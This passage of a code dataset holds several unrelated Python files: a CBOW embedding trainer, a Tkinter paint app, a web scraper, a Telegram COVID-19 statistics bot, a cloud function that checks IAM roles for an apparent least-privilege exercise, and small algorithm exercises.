WaitingUserPool.remove(user_id=user_id)\n        if not removed:\n            raise CanNotStopForwardingMessage\n","sub_path":"ParkingFinder/services/user_request.py","file_name":"user_request.py","file_ext":"py","file_size_in_byte":13858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"246468201","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport numpy as np\r\nimport time\r\n\r\n\r\ntorch.manual_seed(1)\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\nCONTEXT_SIZE = 4  # 2 words to the left, 2 to the right\r\nEMBED_DIM = 5\r\nEPOCH = 3000\r\n\r\nraw_text = \"\"\"We are about to study the idea of a computational process.\r\nComputational processes are abstract beings that inhabit computers.\r\nAs they evolve, processes manipulate other abstract things called data.\r\nThe evolution of a process is directed by a pattern of rules\r\ncalled a program. People create programs to direct processes. 
In effect,\r\nwe conjure the spirits of the computer with our spells.\"\"\".split()\r\n\r\n\r\n# By deriving a set from `raw_text`, we deduplicate the array\r\nvocab = set(raw_text)\r\nvocab_size = len(vocab)\r\n\r\n\r\nword_to_ix = {word: i for i, word in enumerate(vocab)}\r\ndata = []\r\nfor i in range(2, len(raw_text) - 2):\r\n context = [raw_text[i - 2], raw_text[i - 1],\r\n raw_text[i + 1], raw_text[i + 2]]\r\n target = raw_text[i]\r\n data.append((context, target))\r\n\r\n\r\nclass CBOW(nn.Module):\r\n\r\n\r\n def __init__(self):\r\n super(CBOW, self).__init__()\r\n self.embed_dim = EMBED_DIM\r\n self.context_size = CONTEXT_SIZE\r\n self.embeddings = nn.Embedding(vocab_size, self.embed_dim)\r\n self.lc = nn.Linear(self.embed_dim, vocab_size, bias=False)\r\n \r\n\r\n def forward(self, inputs):\r\n embeds = self.embeddings(inputs.to(device))\r\n output = embeds.mean(dim=0)\r\n output = self.lc(output)\r\n\r\n return output\r\n\r\n\r\n# create your model and train. here are some functions to help you make\r\n# the data ready for use by your module\r\n\r\n\r\ndef make_context_vector(context, word_to_ix):\r\n idxs = [word_to_ix[w] for w in context]\r\n context_vector = torch.tensor(idxs, dtype=torch.long)\r\n return context_vector\r\n\r\n\r\nmake_context_vector(data[0][0], word_to_ix) # example\r\n\r\nloss_func = nn.CrossEntropyLoss()\r\nnet = CBOW()\r\nnet.to(device)\r\noptimizer = optim.Adam(net.parameters(), lr=0.016, betas=(0.99, 0.999), eps=1e-08, weight_decay=0, amsgrad=True)\r\n\r\n#for param in net.parameters():\r\n# print(param)\r\nstart = time.time()\r\n\r\nfor epoch in range(EPOCH):\r\n loss_total = 0\r\n for context, target in data:\r\n context_inx = make_context_vector(context, word_to_ix)\r\n net.zero_grad()\r\n similarity = net(context_inx)\r\n loss = loss_func(similarity.view(1,-1), torch.tensor([word_to_ix[target]], device = device))\r\n # print('The cross entropy loss value is {}'.format(loss))\r\n loss.backward()\r\n optimizer.step()\r\n\r\n loss_total += loss.data\r\n \r\nprint('Epoch: {} |The cross entropy loss value is {}'.format(epoch + 1, loss_total))\r\n\r\ndef ix_to_word(ix):\r\n vocab_list = list(word_to_ix.keys())\r\n word_predicted = vocab_list[0]\r\n for word in word_to_ix:\r\n if word_to_ix[word] == ix:\r\n word_predicted = word\r\n\r\n return word_predicted\r\n\r\n\r\n# output the parameters\r\nword2vec = torch.zeros(vocab_size, EMBED_DIM)\r\nfor param in net.parameters():\r\n word2vec = word2vec + torch.Tensor.cpu(param.detach())\r\n\r\nword2numpy = word2vec.numpy()\r\nnp.savetxt(\"vectors.csv\", word2numpy, delimiter=\",\")\r\n\r\nprint(\"The vacabulary size is {}.\".format(vocab_size));\r\n\r\n## testing\r\ncontext = ['the','idea','a', 'abstract']\r\ncontext_vector = make_context_vector(context, word_to_ix)\r\na = torch.Tensor.cpu(net(context_vector)).data.numpy()\r\nprint('Context: {}\\n'.format(context))\r\nprint('Prediction: {}'.format(ix_to_word(a.argmax())))\r\nend = time.time()\r\nprint(\"Time elapsed: {}\".format(end - start))\r\nprint(device)\r\n","sub_path":"CBOWImplementation.py","file_name":"CBOWImplementation.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"307713665","text":"\"\"\"Homework file for my students to have fun with some algorithms! 
\"\"\"\n\n\ndef find_greatest_number(incoming_list):\n return max(incoming_list)\n\n\ndef find_least_number(incoming_list):\n return min(incoming_list)\n\n\ndef add_list_numbers(incoming_list):\n total_sum = 0\n if incoming_list is None:\n total_sum = 0\n else:\n total_sum = sum(incoming_list)\n return total_sum\n\n\ndef longest_value_key(incoming_dict):\n try:\n key_result = None\n max_value = 0\n for key in incoming_dict:\n if len(incoming_dict[key]) > max_value:\n max_value = len(incoming_dict[key])\n key_result = key\n except:\n incoming_dict = None\n\n return key_result\n","sub_path":"fun/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"193894052","text":"# coding: utf-8\n__author__ = 'п'\nfrom action import Spam\n\nclass Hbody():\n def body_print(self):\n s = Spam()\n html = '\\n'\n head = '\\n'\n title = '\\n'\n meta = '<meta http-equiv=\"Content-Type\" content=\"text/html; charset = utf-8\">\\n'\n ztitle = '\\n'\n zhead = '\\n'\n body = '\\n'\n p1 = '
<p><strong>'+s.hello()\n        zstrong = '</strong></p>\n'\n        p2 = '<p><i>'+s.rand()\n        zp2 = '</i></p>\n'\n        p3 = '<p><i>\n'\n        zi = '</i></p>
\\n'\n zbody = '\\n'\n zhtml = '\\n'\n mn = html+head+title+meta+ztitle+zhead+body+p1+zstrong+p2+zp2+p3+zi+zbody+zhtml\n return mn\n\nh = Hbody()\nd = 0\nwhile d <= 30000:\n with open(\"masseges/\"+str(d)+\"_body.html\", \"w\") as f:\n t = h.body_print()\n f.write(t.encode('utf-8').decode('cp1251')) # кодируем в том формате в котором работаем, а затем декодируем в том, в котором нужно получить файл\n d=d+1","sub_path":"body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"556178506","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport urllib.parse\r\nimport os\r\nfrom ebook import Chapter, Ebook\r\n\r\nBASE_URL = 'https://zh.m.wikisource.org/wiki/%E9%87%91%E7%93%B6%E6%A2%85'\r\n\r\npage = requests.get(BASE_URL)\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\n\r\nlinks = soup.find('table', class_='multicol').find_all('a')\r\ntitle = '金瓶梅'\r\n\r\ndef download():\r\n \r\n ebook = Ebook(title)\r\n\r\n for link in links:\r\n print(link)\r\n\r\n chapter_name = link.get_text()\r\n page = requests.get(urllib.parse.urljoin(BASE_URL, link['href']))\r\n soup = BeautifulSoup(page.content, 'html.parser', from_encoding=\"gb18030\")\r\n\r\n # create chapter header\r\n chapter = Chapter(chapter_name)\r\n\r\n chapter_content = get_content(soup)\r\n\r\n chapter.set_content(chapter_content)\r\n ebook.add_chapter(chapter)\r\n\r\n ebook.save()\r\ndef get_content(soup):\r\n c = BeautifulSoup()\r\n section = soup.find('section', class_='mf-section-0')\r\n ps = section.find_all('p')\r\n for p in ps:\r\n c.append(p)\r\n \r\n return c\r\nif __name__ == '__main__': \r\n download()","sub_path":"download_jpm.py","file_name":"download_jpm.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"55066357","text":"print(\"Wprowadz ilosc liczb ktore chcesz wpisac\")\r\n\r\nilosc = input()\r\n\r\nprint(\"Wprowadz liczby ktore chcesz posortowac\")\r\n\r\nlista =[]\r\n\r\ni = 0\r\n\r\nwhile(i', self.draw_start)\n self.draw_zone.bind('',self.draw_motion)\n self.draw_zone.bind('',self.draw_end)\n self.draw_zone.bind(\"\", self.change_text)\n\n self.mode = ''\n \n \n def keyFun(self, event):\n print(\"h\")\n print(event)\n\n\n def line_start(self,event):\n self.line_start_x=event.x\n self.line_start_y=event.y\n def line_motion(self,event):\n self.draw_zone.delete('temp_line_objects')\n self.draw_zone.create_line(self.line_start_x,self.line_start_y,event.x,event.y,fill=self.DEFAULT_COLOR,smooth=1,tags='temp_line_objects')\n def line_end(self,event):\n self.draw_zone.delete('temp_line_objects')\n x=self.draw_zone.create_line(self.line_start_x,self.line_start_y,event.x,event.y,fill=self.DEFAULT_COLOR,smooth=1)\n self.Line_objects.append(x)\n self.stack.append(x)\n\n\n def circle_start(self,event):\n self.circle_start_x = event.x\n self.circle_start_y = event.y\n def circle_motion(self,event):\n self.draw_zone.delete('temp_circle_objects') #sym de circle_end par rapport a circle_start\n #self.draw_zone.create_oval(event.x,event.y,(2*self.circle_start_x-event.x),(2*self.circle_start_y-event.y),tags='temp_circle_objects')\n self.draw_zone.create_oval((self.circle_start_x),(self.circle_start_y),event.x,event.y,fill=None,tags='temp_circle_objects')\n def circle_end(self,event):\n self.draw_zone.delete('temp_circle_objects') \n 
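        # The line commented out below is an alternative anchoring for the oval:
        # it reflects the drag point through the press point, so the press point
        # becomes the center of the oval rather than one corner. As a sketch
        # (same canvas and start attributes as above; Tkinter's create_oval
        # takes two opposite bounding-box corners):
        #   x0 = 2 * self.circle_start_x - event.x
        #   y0 = 2 * self.circle_start_y - event.y
        #   self.draw_zone.create_oval(event.x, event.y, x0, y0)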
#x=self.draw_zone.create_oval(event.x,event.y,(2*self.circle_start_x-event.x),(2*self.circle_start_y-event.y))\n x=self.draw_zone.create_oval((self.circle_start_x),(self.circle_start_y),event.x,event.y,fill=None)\n self.stack.append(x)\n\n\n def point_start(self,event):\n x = self.draw_zone.create_line(event.x,event.y,event.x+1,event.y+1)\n self.Point_objects.append(x)\n\n#create line from this place to previous place\n\n def freehand_start(self, event):\n self.px = event.x\n self.py = event.y\n self.stack.append(\"start\")\n def freehand_motion(self, event):\n x = self.draw_zone.create_line(self.px, self.py, event.x, event.y, fill=self.DEFAULT_COLOR,smooth=1)\n self.px = event.x\n self.py = event.y\n self.stack.append(x)\n def freehand_end(self, event):\n self.stack.append(\"end\")\n\n\n def text_start(self, event):\n self.text_start_x = event.x\n self.text_start_y = event.y\n def text_motion(self, event):\n self.draw_zone.delete('temp_text_objects')\n self.draw_zone.create_text(self.text_start_x, self.text_start_y, text = \"hello\", font = (\"Purisa\", math.floor(0.8*(event.y-self.text_start_y))), tags = 'temp_text_objects', anchor = NW)\n def text_end(self, event):\n self.draw_zone.delete('temp_text_objects')\n self.d = self.draw_zone.create_text(self.text_start_x, self.text_start_y, text = \"hello\", font = (\"Purisa\", math.floor(0.8*(event.y-self.text_start_y))), anchor = NW)\n self.mode = 'edit'\n def change_text(self, event):\n print(self.d)\n self.d.config(text=\"hello\")\n # self.draw_zone.delete(self.d)\n\n \n \n \n\n def set_tool_line(self):\n self.tool_option = 'line'\n def set_tool_circle(self):\n self.tool_option = 'circle'\n def set_tool_point(self):\n self.tool_option = 'point'\n def set_tool_freehand(self):\n self.tool_option = 'freehand'\n def set_tool_text(self):\n self.tool_option = 'text'\n\n def draw_start(self,event):\n print(\"hello\")\n if self.tool_option=='line':\n self.line_start(event)\n elif self.tool_option == 'circle':\n self.circle_start(event)\n elif self.tool_option=='point':\n self.point_start(event)\n elif self.tool_option == \"freehand\":\n self.freehand_start(event)\n elif self.tool_option == 'text':\n self.text_start(event)\n\n def draw_motion(self,event):\n if self.tool_option=='line':\n self.line_motion(event)\n if self.tool_option == 'freehand':\n self.freehand_motion(event)\n elif self.tool_option == 'circle':\n self.circle_motion(event)\n elif self.tool_option == 'text':\n self.text_motion(event)\n def draw_end(self,event):\n if self.tool_option=='line':\n self.line_end(event)\n if self.tool_option=='freehand':\n self.freehand_end(event)\n elif self.tool_option == 'circle':\n self.circle_end(event)\n elif self.tool_option == 'text':\n self.text_end(event)\n\n def undo(self):\n \n x = self.stack.pop()\n if x == \"end\":\n while x != \"start\":\n x = self.stack.pop()\n self.draw_zone.delete(x)\n else:\n self.draw_zone.delete(x) \n\n def alert(self):\n print('yo')\n\nif __name__ == '__main__':\n ge = Paint()\n","sub_path":"canvas3.py","file_name":"canvas3.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"62664753","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nModulo bot - Mantem as funções que gerenciam o bot\r\n\"\"\"\r\n\r\n\r\nimport os\r\nimport logging\r\nimport pickle\r\nimport datetime\r\nimport re\r\nimport json\r\n\r\nfrom uuid import uuid4\r\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, 
InlineQueryHandler\r\nfrom telegram import InlineQueryResultArticle, InputTextMessageContent, ParseMode\r\n\r\nfrom dasbot.corona import SeriesChart, DataPanel\r\nfrom dasbot.world import WorldOMeterData\r\nfrom dasbot.oms import OMSData\r\nfrom dasbot.brasil_io import BrasilIOData\r\nfrom dasbot.db import JobCacheRepo, BotLogRepo, CasesRepo\r\n\r\n\r\n# Enable logging\r\nlogger = logging.getLogger(__name__)\r\n\r\nuse_db = os.environ.get(\"USE_DB\", False)\r\n# futuros comandos administrativos\r\nadmin_id = int(os.environ.get(\"ADMIN_ID\", 0))\r\n# ajuste para o nome do canal a receber as atualizações\r\nchannel_id = os.environ.get(\"CHANNEL_ID\", \"\")\r\n\r\nif use_db:\r\n logging.basicConfig(level=logging.INFO)\r\nelse:\r\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\r\n filemode=\"a\",\r\n filename=\"logs/log_{}.log\".format(\r\n datetime.datetime.strftime(datetime.datetime.now(), \"%Y_%m_%d\")),\r\n level=logging.INFO)\r\n\r\n\r\ndef _log_message_data(message):\r\n result = dict()\r\n result[\"date\"] = message[\"date\"].isoformat()\r\n result[\"chat_id\"] = message[\"chat\"][\"id\"]\r\n result[\"username\"] = message[\"chat\"][\"username\"] or message[\"chat\"][\"last_name\"] or message[\"chat\"][\"first_name\"]\r\n result[\"text\"] = message[\"text\"]\r\n return json.dumps(result).replace(\"\\\"\", \"\\'\")\r\n\r\n\r\nclass JobsInfo(object):\r\n def __init__(self, file_name):\r\n self._jobs = dict()\r\n self.file_name = file_name\r\n self._props = [\"interval\", \"repeat\", \"context\"]\r\n\r\n @property\r\n def jobs(self):\r\n return self._jobs\r\n\r\n def save(self):\r\n with open(self.file_name, 'wb') as f:\r\n data = {key: {var: getattr(job, var) for var in self._props} for key, job in self._jobs.items()}\r\n pickle.dump(data, f)\r\n\r\n def load(self):\r\n if os.path.exists(self.file_name):\r\n with open(self.file_name, 'rb') as f:\r\n return pickle.load(f)\r\n return {}\r\n\r\n def push(self, key, data):\r\n self._jobs[key] = data\r\n\r\n def pop(self, key):\r\n result = self._jobs[key]\r\n del self._jobs[key]\r\n return result\r\n\r\n def exists(self, key):\r\n return key in self._jobs\r\n\r\n\r\nclass JobsDBInfo(JobsInfo):\r\n def __init__(self):\r\n super().__init__(\"\")\r\n\r\n def save(self):\r\n repo = JobCacheRepo()\r\n for key, job in self.jobs.items():\r\n data = dict()\r\n data[\"job_id\"] = key\r\n for prop in [\"interval\", \"repeat\"]:\r\n data[prop] = getattr(job, prop)\r\n for prop in [\"region\", \"chat_id\", \"new\"]:\r\n data[prop] = job.context.get(prop)\r\n for prop, i in {\"cases\": 0, \"deaths\": 1, \"recovery\": 2}.items():\r\n data[prop] = job.context.get(\"last\")[i]\r\n repo.add(data)\r\n repo.save()\r\n\r\n def load(self):\r\n jobs = dict()\r\n repo = JobCacheRepo()\r\n repo.load()\r\n for row in repo.rows:\r\n data = dict()\r\n data[\"interval\"] = row[\"interval\"]\r\n data[\"repeat\"] = row[\"repeat\"]\r\n data[\"context\"] = {\"region\": row[\"region\"],\r\n \"chat_id\": row[\"chat_id\"],\r\n \"new\": row[\"new\"],\r\n \"last\": [row[\"cases\"], row[\"deaths\"], row[\"recovery\"]]}\r\n jobs[row[\"job_id\"]] = data\r\n return jobs\r\n\r\n\r\nclass DBLogHandler(logging.Handler):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def emit(self, record):\r\n message = record.getMessage()\r\n command = re.findall(r'Arrive ([/\\w]+) (?:command|message) \"([^\"]+)\"', message)\r\n if command:\r\n command_string = command[0][1]\r\n args = json.loads(command_string.replace(\"\\'\", \"\\\"\"))\r\n repo = 
BotLogRepo()\r\n data = dict()\r\n data[\"chat_id\"] = args[\"chat_id\"]\r\n data[\"username\"] = args[\"username\"]\r\n data[\"command\"] = command[0][0]\r\n data[\"args\"] = args[\"text\"]\r\n repo.add(data)\r\n repo.save()\r\n\r\n\r\ndef start(update, context):\r\n \"\"\"Send a message when the command /start is issued.\"\"\"\r\n update.message.reply_text(\"\"\"Olá. Sou um bot de dados de casos de COVID-19 no Brasil.\r\n Digite /help para ver as opções\"\"\")\r\n\r\n\r\ndef help(update, context):\r\n \"\"\"Send a message when the command /help is issued.\"\"\"\r\n logger.info('Arrive /help command \"%s\"', _log_message_data(update.effective_message))\r\n update.message.reply_text(\"\"\"Comandos que você pode enviar\r\n /start : inicia o bot\r\n /help : mostra a ajuda\r\n /stats : mostra os números de casos mais atualizados do Brasil\r\n /chart : desenha um gráfico com a região informada, ex: /chart SP\r\n /listen : observa os dados de uma região a cada X minutos (experimental)\r\n /mute : para de observar a região programada com o /listen\r\nEnvie uma sigla de estado ou nome de cidade, para saber os confirmados nessa região\r\nFontes de Dados: \r\n WorldOmeter (https://www.worldometers.info/coronavirus/)\r\n Brasil.io (https://brasil.io/dataset/covid19/caso) CC BY-SA 4.0\r\n OMS (https://dashboards-dev.sprinklr.com)\"\"\")\r\n\r\n\r\ndef error(update, context):\r\n \"\"\"Log Errors caused by Updates.\"\"\"\r\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\r\n\r\n\r\ndef stats(update, context):\r\n logger.info('Arrive /stats command \"%s\"', _log_message_data(update.effective_message))\r\n sources = [WorldOMeterData(), OMSData(), BrasilIOData()]\r\n result = []\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n result.append(corona.description)\r\n\r\n if result:\r\n update.message.reply_markdown(\"Região: *{}*\\n{}\".format(\"BR\", \"\\n\".join(result)))\r\n else:\r\n update.message.reply_text(\"Dados não disponíveis. Tente mais tarde\")\r\n\r\n\r\ndef general(update, context):\r\n logger.info('Arrive text message \"%s\"', _log_message_data(update.effective_message))\r\n region = update.message.text\r\n result = []\r\n sources = [WorldOMeterData(region), OMSData(region), BrasilIOData(region)]\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n result.append(corona.description)\r\n\r\n if result:\r\n update.message.reply_markdown(\"Região: *{}*\\n{}\".format(region, \"\\n\".join(result)))\r\n else:\r\n update.message.reply_text(\"\"\"Região não reconhecida ou sem dados. \r\nEnvie a sigla do estado em maiúsculas, nomes de cidade com acentos. \r\nEnvie /help para ver a ajuda.\"\"\")\r\n\r\n\r\ndef _get_chart(regions):\r\n sources = []\r\n if regions:\r\n for region in regions:\r\n corona = BrasilIOData(region.strip())\r\n corona.refresh()\r\n sources.append(corona)\r\n\r\n chart_br = SeriesChart(*sources)\r\n if chart_br.validate():\r\n image = chart_br.image()\r\n caption = \"Atualizado: {}\".format(sources[0].last_date.strftime(\"%d-%m-%Y %H:%M\"))\r\n return image, caption\r\n return None\r\n\r\n\r\ndef chart(update, context):\r\n logger.info('Arrive /chart command \"%s\"', _log_message_data(update.effective_message))\r\n regions = \" \".join(context.args).split(\",\")\r\n chart_data = _get_chart(regions)\r\n if chart_data:\r\n update.message.reply_photo(photo=chart_data[0], caption=chart_data[1])\r\n else:\r\n update.message.reply_text(\"\"\"A lista de regiões não foi reconhecida. 
\r\nEnvie a sigla de estado em maiúsculas, nomes de cidade com acentos.\r\nExemplos: /chart SP, RJ - /chart São Paulo, Belo Horizonte \r\nEnvie /help para ver a ajuda.\"\"\")\r\n\r\n\r\ndef inline_query(update, context):\r\n \"\"\"Handle the inline query.\"\"\"\r\n query = update.inline_query.query\r\n if not query:\r\n return\r\n\r\n logger.info('Query inline \"%s\"', update.inline_query)\r\n\r\n sources = [WorldOMeterData(query), OMSData(query), BrasilIOData(query)]\r\n results = []\r\n\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n results.append(InlineQueryResultArticle(\r\n id=uuid4(),\r\n title=\"{} por {} em {}\".format(query, corona.data_source, corona.last_date.strftime(\"%d-%m\")),\r\n input_message_content=InputTextMessageContent(\r\n corona.description,\r\n parse_mode=ParseMode.MARKDOWN)))\r\n\r\n update.inline_query.answer(results, cache_time=60)\r\n\r\n\r\ndef unknown(update, context):\r\n update.message.reply_text(\"Não entendi esse comando\")\r\n\r\n\r\ndef on_change_notifier(context):\r\n region = context.job.context[\"region\"]\r\n sources = [BrasilIOData(region)]\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n last = context.job.context[\"last\"]\r\n if last and sum(last) > 0:\r\n changes = [i - j for i, j in zip(corona.get_data(), last)]\r\n else:\r\n changes = [0, 0, 0]\r\n if sum(changes) > 0 or not context.job.context.get(\"new\", True):\r\n description = \"Região: *{}*\\n{}\".format(region, corona.get_description(changes))\r\n context.bot.send_message(chat_id=context.job.context[\"chat_id\"],\r\n text=description,\r\n parse_mode=ParseMode.MARKDOWN)\r\n context.job.context[\"last\"] = corona.get_data()\r\n\r\n\r\ndef refresh_data(context):\r\n WorldOMeterData.load()\r\n OMSData.load()\r\n BrasilIOData.load()\r\n\r\n job_context = context.job.context\r\n\r\n # busca atualizações de dados nos data sources para informar no canal\r\n # e para guardar na tabela de casos, se o banco estiver ativo\r\n region = job_context[\"region\"]\r\n sources = [WorldOMeterData(region), BrasilIOData(region)]\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n corona_data = corona.get_data()\r\n if corona.data_source not in job_context:\r\n job_context[corona.data_source] = {\"last\": corona_data}\r\n else:\r\n last = job_context[corona.data_source][\"last\"]\r\n changes = [i - j for i, j in zip(corona_data, last)]\r\n if sum(changes) > 0:\r\n job_context[corona.data_source][\"last\"] = corona_data\r\n if job_context[\"chat_id\"]:\r\n context.bot.send_message(job_context[\"chat_id\"],\r\n text=corona.get_description(changes),\r\n parse_mode=ParseMode.MARKDOWN)\r\n if use_db:\r\n repo = CasesRepo()\r\n data = {\r\n \"source\": corona.data_source,\r\n \"region\": region,\r\n \"cases\": corona_data[0],\r\n \"deaths\": corona_data[1],\r\n \"recovery\": corona_data[2],\r\n \"date\": corona.last_date\r\n }\r\n repo.add(data)\r\n repo.save()\r\n\r\n\r\nif use_db:\r\n logger.addHandler(DBLogHandler())\r\n _jobs = JobsDBInfo()\r\nelse:\r\n _jobs = JobsInfo(\"logs/jobs.pickle\")\r\n\r\n\r\ndef set_timer(update, context):\r\n \"\"\"Adiciona uma região na lista de jobs\"\"\"\r\n logger.info('Arrive /listen command \"%s\"', _log_message_data(update.effective_message))\r\n chat_id = update.message.chat_id\r\n try:\r\n region = context.args[0]\r\n minutes = int(context.args[1]) if len(context.args) > 1 else 5\r\n only_new = context.args[2] == \"--new\" if len(context.args) > 2 else False\r\n\r\n if not region or minutes 
< 1:\r\n raise ValueError\r\n\r\n # Add job to queue\r\n job = context.job_queue.run_repeating(on_change_notifier, minutes * 60, first=5,\r\n context={\"chat_id\": str(chat_id), \"region\": region,\r\n \"new\": only_new, \"last\": [0, 0, 0]})\r\n _jobs.push(str(chat_id), job)\r\n _jobs.save()\r\n\r\n update.message.reply_text('Monitoramento ativado!')\r\n\r\n except (IndexError, ValueError):\r\n update.message.reply_text(\"Use: /listen \\nUse: /mute para parar de observar\")\r\n\r\n\r\ndef unset_timer(update, context):\r\n \"\"\"Remove o job programado\"\"\"\r\n logger.info('Arrive /mute command \"%s\"', _log_message_data(update.effective_message))\r\n chat_id = str(update.message.chat_id)\r\n\r\n if not _jobs.exists(chat_id):\r\n update.message.reply_text('Nenhum monitoramento ativo')\r\n return\r\n\r\n job = _jobs.pop(chat_id)\r\n job.schedule_removal()\r\n _jobs.save()\r\n\r\n update.message.reply_text('Monitoramento desativado')\r\n\r\n\r\ndef main():\r\n \"\"\"Start the bot.\"\"\"\r\n # Certifique-se que exista uma variavel de ambiente com o nome TELEGRAM_TOKEN\r\n # setada com o token do seu bot\r\n updater = Updater(os.environ.get(\"TELEGRAM_TOKEN\", \"Get token on bot father!\"), use_context=True)\r\n\r\n dp = updater.dispatcher\r\n\r\n dp.add_handler(CommandHandler(\"start\", start))\r\n dp.add_handler(CommandHandler(\"help\", help))\r\n dp.add_handler(CommandHandler(\"stats\", stats))\r\n dp.add_handler(CommandHandler(\"chart\", chart))\r\n dp.add_handler(CommandHandler(\"listen\", set_timer, pass_args=True, pass_job_queue=True))\r\n dp.add_handler(CommandHandler(\"mute\", unset_timer))\r\n dp.add_handler(MessageHandler(Filters.text & ~Filters.update.channel_post, general))\r\n dp.add_handler(InlineQueryHandler(inline_query))\r\n dp.add_handler(MessageHandler(Filters.command, unknown))\r\n\r\n # job para atualizar os dados das fontes e atualizar o canal caso haja novos casos\r\n refresh_time = int(os.environ.get(\"REFRESH_TIME\", \"600\"))\r\n dp.job_queue.run_repeating(refresh_data, refresh_time, first=5, context={\"chat_id\": channel_id, \"region\": \"BR\"})\r\n\r\n # carrega a lista de jobs que estavam programados\r\n\r\n jobs = _jobs.load()\r\n for key, data in jobs.items():\r\n if data.get(\"repeat\", True):\r\n _jobs.push(key, dp.job_queue.run_repeating(on_change_notifier,\r\n data.get(\"interval\", 300), context=data.get(\"context\")))\r\n else:\r\n _jobs.push(key, dp.job_queue.run_once(on_change_notifier,\r\n data.get(\"interval\", 300), context=data.get(\"context\")))\r\n\r\n # log all errors\r\n dp.add_error_handler(error)\r\n\r\n # Inicia o Bot no modo polling\r\n updater.start_polling()\r\n\r\n # Roda até receber um Ctrl-C\r\n updater.idle()\r\n\r\n _jobs.save()\r\n","sub_path":"dasbot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344431519","text":"from flask import render_template\ndef main(request):\n\tfrom googleapiclient import discovery\n\timport google.auth\n\timport os\n\t\n\t\n\t# Set the project ID\n\tPROJECT_ID = os.environ['GCP_PROJECT']\n\t\n\t# Get function env variable\n\tNONCE = os.environ.get('NONCE', 'Specified environment variable is not set.')\n\tRESOURCE_PREFIX = os.environ.get('RESOURCE_PREFIX', 'Specified environment variable is not set.')\n\tLEVEL_NAME = os.environ.get('LEVEL_NAME', 'Specified environment variable is not set.')\n\n\tPRI = {{fvar|safe}}[0]\n\t\n\t# Get credential of cloud function 
account\n\tcredentials, project_id = google.auth.default()\n\n\t# Build cloudresourcemanager REST API python object\n\tservice_r = discovery.build('cloudresourcemanager','v1', credentials=credentials)\n\t\n\t# Service account \n\tsa = f'serviceAccount:{RESOURCE_PREFIX}-f-access-{NONCE}-sa@{PROJECT_ID}.iam.gserviceaccount.com'\n\n\tget_iam_policy_request_body = {}\n\t\n\troles =[]\n\tpermissions =[]\n\tmsg = ''\n\terr=''\n\ttry:\n\t\tbindings = service_r.projects().getIamPolicy(resource=PROJECT_ID, body=get_iam_policy_request_body).execute()[\"bindings\"]\n\t\tfor r in bindings:\n\t\t\tif sa in r[\"members\"]:\n\t\t\t\troles.append(r[\"role\"])\n\texcept Exception as e: \n\t\tpermissions =[]\n\t\tmsg ='There is an error'\n\t\terr = str(e)\n\tif len(roles)>1 or PRI != roles[0]:\n\t\tmsg='Not least privilege role, please try again!'\n\telse:\n\t\tmsg='Congratulations! You got the least privilege role.'\n\t\t\n\t\t\n\t# Build iam REST API python object\n\tservice_i = discovery.build('iam','v1', credentials=credentials)\n\n\t\n\ttry:\n\t\tpermissions = service_i.roles().get(name=roles[0]).execute()[\"includedPermissions\"]\n\t\t\n\t\t\n\texcept Exception as e: \n\t\tpermission =[]\n\t\terr = str(e)\n\t\n\treturn render_template(f'{RESOURCE_PREFIX}-check.html', pers=permissions, msg=msg, rn=roles[0], err=err, prefix=RESOURCE_PREFIX,level_name=LEVEL_NAME,nonce=NONCE)","sub_path":"core/levels/leastprivilege/pd1/pd1/functioncheck/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"57390351","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/14 19:03\n# @Author : zyk\n\n# 给定一个二叉树,找出其最大深度。\n#\n# 二叉树的深度为根节点到最远叶子节点的最长路径上的节点数。\n#\n# 说明: 叶子节点是指没有子节点的节点。\n#\n# 示例:\n# 给定二叉树 [3,9,20,null,null,15,7],\n#\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# 返回它的最大深度 3 。\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def maxDepth(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root:\n return 0\n else:\n left = self.maxDepth(root.left)\n right = self.maxDepth(root.right)\n return max(left, right)+1\n","sub_path":"104_Maximum Depth of Binary Tree.py","file_name":"104_Maximum Depth of Binary Tree.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"99666777","text":"import socket\r\n\r\nsock = socket.socket(socket.AF_INET, 